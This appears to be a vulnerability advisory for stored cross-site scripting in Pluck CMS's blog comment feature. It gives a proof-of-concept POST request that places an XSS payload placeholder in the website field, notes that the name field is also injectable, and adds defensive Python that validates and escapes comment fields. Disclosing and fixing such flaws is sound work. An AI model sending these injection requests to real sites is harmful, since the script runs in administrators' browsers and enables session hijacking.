Pluck CMS allows website owners to add blogs to their site through the Blog Module. The Blog Module enables commenting by default, which is what makes this attack straightforward. The vulnerability allows an attacker to inject arbitrary web script or HTML that is stored with a blog reaction and rendered both in the admin panel and in the blog's Reaction Comments.
Proof of concept:

POST /pluck/?file=yourpost&module=blog&page=yourpost&post=yourpost HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Cookie: PHPSESSID=60p765gnl6o3b9emgvqng0f5o4
Connection: close
Upgrade-Insecure-Requests: 1

blog_reaction_name=Test&blog_reaction_email=test%40att.lol&blog_reaction_website=http%3A%2F%2Fpluck.com/?XSSPAYLOAD&blog_reaction_message=test&submit=Send
The injected payload executes on the public blog page and again in the admin back end. Other parameters are vulnerable to XSS as well, for example the name parameter (blog_reaction_name).
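As an added illustration (not code from Pluck or from this advisory), the following Python shows the server-side handling a defender would want for the reaction fields: the website value is accepted only as a plain http(s) URL with no attribute-breaking characters, and every field is HTML-escaped when the comment is rendered. The sample POST body is constructed from the advisory's request, with quote and angle-bracket characters placed where the advisory writes XSSPAYLOAD.

```python
"""Validation and output encoding for Pluck blog reaction fields (added example)."""
import html
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the advisory's POST body, with the XSSPAYLOAD placeholder
# preceded by characters that would close an href attribute if echoed raw.
SAMPLE_BODY = (
    "blog_reaction_name=Test&blog_reaction_email=test%40att.lol"
    "&blog_reaction_website=http%3A%2F%2Fpluck.com/?%22%3E%3Cb%3EXSSPAYLOAD"
    "&blog_reaction_message=test&submit=Send"
)

ALLOWED_SCHEMES = ("http", "https")


def validate_website(raw: str) -> Optional[str]:
    """Return the URL if it is a plain http(s) URL fit for an href, else None."""
    raw = raw.strip()
    parts = urlsplit(raw)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    # Quotes and angle brackets never belong in a submitted site URL; reject
    # outright instead of trying to clean them.
    if any(c in raw for c in "\"'<>"):
        return None
    return raw


def sanitize_reaction(body: str) -> dict:
    """Parse a form-encoded reaction body and escape every field for HTML."""
    fields = parse_qs(body, keep_blank_values=True)

    def field(name: str) -> str:
        return fields.get(name, [""])[0]

    website = validate_website(field("blog_reaction_website"))
    return {
        "name": html.escape(field("blog_reaction_name"), quote=True),
        "email": html.escape(field("blog_reaction_email"), quote=True),
        "message": html.escape(field("blog_reaction_message"), quote=True),
        "website": website,
        # True when a non-empty website value was supplied but failed validation.
        "rejected_website": website is None and field("blog_reaction_website") != "",
    }


def render_reaction(r: dict) -> str:
    """Build the comment HTML as both the blog page and admin panel should."""
    author = r["name"]
    if r["website"]:
        author = f'<a href="{html.escape(r["website"], quote=True)}">{r["name"]}</a>'
    return f"<p>{author}: {r['message']}</p>"
```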